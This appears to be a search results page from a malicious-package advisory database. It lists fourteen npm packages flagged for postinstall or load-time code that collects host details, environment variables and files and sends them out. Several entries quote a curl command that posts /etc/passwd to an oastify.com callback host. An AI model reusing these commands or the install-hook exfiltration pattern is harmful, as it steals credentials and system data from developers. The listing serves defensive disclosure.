14 matches found
MAL-2026-6498 Malicious code in dttfdsdee (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate databas...
Malicious code in zer0onedatetool (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 73fd05fda74bbf13c6275d4da0fa80fece821cad03fb2237ae74ed24309eab52 The postinstall lifecycle script in this package issues curl POST requests to a subdomain of oastify.com — the out-of-band callback domain operated b...
Malicious code in @shell-landing/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6db5f32788db0c0eefee1ec8520b56ef908f8909cd79d5fdb16c2595c65f1577 On npm install, the package's postinstall hook runs node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd'...
Malicious code in @shell-cabinet/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b385f020626d8bad774fe5ebd776683b547bea4edef85944af658fd0155924ad On npm install, the package's postinstall hook runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, posting the...
MAL-2026-5410 Malicious code in @easy-entry/routes (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516 On npm install, the package's postinstall hook in package.json runs curl --data '@/etc/passwd' $hostname.200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com...
MAL-2026-5388 Malicious code in @0xlr/stripe-checkout-js (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 65b2bf8dcdc0fc9b8fdbf14bbf58a011707a4425cf0029867e28067c08ef5566 On npm install, postinstall.js enumerates the full process.env keyspace plus host identifiers os.hostname, username, homedir, cwd, argv, OS details a...
MAL-2026-5393 Malicious code in @sflyinc-knapsack/shutterfly-react (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d1b554d911cfb6d444727262a62e2db10f22a75d53d23741d6c2684f62fb6e5d On require/load, index.js collects host identifiers os.hostname, os.userInfo, os.homedir, DNS server configuration, package.json metadata, and dirnam...
MAL-2026-5392 Malicious code in @open-banking/cabinet-providers (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 376acc0a3b29a3d768a5be7ea618329182989929f9e31fac8c176836b7c4b280 @open-banking/[email protected] is a dependency-confusion bait package anomalously high version under a generic scope that exfiltrates...
MAL-2026-4670 Malicious code in skills-detector (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 844190b21455d308d6e2b5305ebe92634d80b55817290a84644a1048df0e54b3 On npm install, postinstall.js executes whoami and id via childprocess.execSync, collects os.hostname, os.platform, current working directory, and th...
MAL-2026-4644 Malicious code in power-platform-playwright-toolkit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 57967d58233d74f2fc4f9b0dee7c050370eb388050df8d63f29e719f83468d73 On npm install, the package's postinstall script postinstall.js collects host identifiers and CI context — whoami, os.hostname, os.platform, cwd, CI,...
MAL-2026-4418 Malicious code in @pluxee-connect/api-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0f5056dda18e9a9f440db7379d09fa1f9f7ff087ac00d6684170cddd40c240e9 On npm install, postinstall.js collects os.hostname, os.userInfo, and process.version and transmits them over plain HTTP to...
Malicious code in jqtools-toolbox-expose (npm)
The package contains code to exfiltrate user and host information to an oastify domain. --- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis cf8ecc5384976555e101e147d0456707c86467e52647ed0bdbc91bc47639356a The OpenSSF Package Analysis project identified...
Malicious code in fireauth.args (npm)
The package exfiltrates data to an oastify domain. --- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c601f7d41a9166b7e84595a25e727e5256c0962af730ee336a07eac2b1e7fe40 The OpenSSF Package Analysis project identified 'fireauth.args' @ 71.69.69 npm as malicious. ...
MAL-2024-7775 Malicious code in fireauth.args (npm)
The package exfiltrates data to an oastify domain. --- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis c601f7d41a9166b7e84595a25e727e5256c0962af730ee336a07eac2b1e7fe40 The OpenSSF Package Analysis project identified 'fireauth.args' @ 71.69.69 npm as malicious. ...